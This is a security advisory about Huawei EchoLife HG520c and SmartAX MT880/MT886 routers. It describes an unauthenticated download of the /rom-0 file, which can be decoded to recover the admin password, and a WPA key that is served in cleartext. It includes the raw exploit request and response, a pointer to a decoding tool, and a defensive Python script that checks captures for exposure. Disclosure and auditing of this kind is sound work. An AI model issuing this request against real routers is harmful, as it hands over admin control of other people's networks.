Huawei Routers Multiple Vulnerabilities

The Huawei EchoLife HG520c router (Shodan search) contains an authentication bypass: the /rom-0 file can be requested without authentication. The file can be reversed using available tools like the one at http://50.57.229.26/zynos.php; the first string returned is the admin password. I tested the following firmware version: 3.10.33.0-1.0.7.0. This also affects the Huawei SmartAX MT880 (Shodan search) running firmware 3.11.2.142, and the MT886 running 3.12.8.20. This is due to the use of RomPager as the underlying server.

GET /rom-0 HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.16
Host: 1.2.3.4
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

HTTP/1.1 200 OK
Content-Type: application/octet-stream
Date: Fri, 07 Jan 2000 06:11:11 GMT
Last-Modified: Tue, 07 Jan 1930 06:11:11 GMT
Content-Length: 16384
Server: RomPager/4.07 UPnP/1.0
EXT:

[…]

echolife1
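As an added example (not code from the original post), the following Python classifies a captured request/response pair for /rom-0, so the owner of a device can confirm from a capture whether a firmware update or access rule has closed the hole. The function names, the verdict strings and the 401 sample response are assumptions constructed for illustration; the first sample is abbreviated from the exchange above.

```python
def parse_head(raw):
    """Return (start_line, headers) for a raw HTTP message; header names lowercased."""
    head = raw.replace("\r\n", "\n").strip().split("\n\n", 1)[0]
    lines = head.split("\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0].strip(), headers


def audit_rom0(request_raw, response_raw):
    """Return 'exposed', 'protected', 'inconclusive' or 'not-applicable'."""
    req_line, req_headers = parse_head(request_raw)
    status_line, resp_headers = parse_head(response_raw)
    path = req_line.split()[1].split("?", 1)[0]
    if path != "/rom-0":
        return "not-applicable"
    # A request that carried credentials says nothing about the bypass.
    if "authorization" in req_headers or "cookie" in req_headers:
        return "inconclusive"
    status = int(status_line.split()[1])
    if status in (401, 403, 404):
        return "protected"  # file refused or not served to anonymous clients
    ctype = resp_headers.get("content-type", "").lower()
    if status == 200 and ctype.startswith("application/octet-stream"):
        return "exposed"  # binary file handed out without authentication
    return "inconclusive"


# Abbreviated from the exchange shown in the post.
PAGE_REQUEST = "GET /rom-0 HTTP/1.1\nHost: 1.2.3.4\nAccept-Encoding: gzip, deflate\n\n"
PAGE_RESPONSE = (
    "HTTP/1.1 200 OK\nContent-Type: application/octet-stream\n"
    "Content-Length: 16384\nServer: RomPager/4.07 UPnP/1.0\nEXT:\n\n"
)
# Constructed sample: what a device that enforces authentication would answer.
FIXED_RESPONSE = 'HTTP/1.1 401 Unauthorized\nWWW-Authenticate: Basic realm="router"\n\n'

if __name__ == "__main__":
    print("capture from post:", audit_rom0(PAGE_REQUEST, PAGE_RESPONSE))
    print("constructed fixed:", audit_rom0(PAGE_REQUEST, FIXED_RESPONSE))
```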

Also, the /home_wlan.html page sends the WPA shared key in cleartext over HTTP.
